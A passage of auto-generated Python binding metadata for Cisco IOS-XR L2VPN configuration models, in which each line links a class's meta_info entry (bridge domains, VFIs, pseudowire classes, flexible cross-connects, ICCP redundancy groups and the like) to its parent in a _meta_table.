_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.Redundancy']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.AutoDiscovery.BgpSignaling']['meta_info'].parent =_meta_table['L2Vpn.AutoDiscovery']['meta_info']
_meta_table['L2Vpn.Utility.Logging']['meta_info'].parent =_meta_table['L2Vpn.Utility']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface.Format']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib']['meta_info'].parent =_meta_table['L2Vpn.Snmp']['meta_info']
_meta_table['L2Vpn.PwRouting']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Neighbor']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Database']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Pbb']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.AutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Utility']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Snmp']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces.Interface']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface']['meta_info'].parent =_meta_table['GenericInterfaceLists']['meta_info']
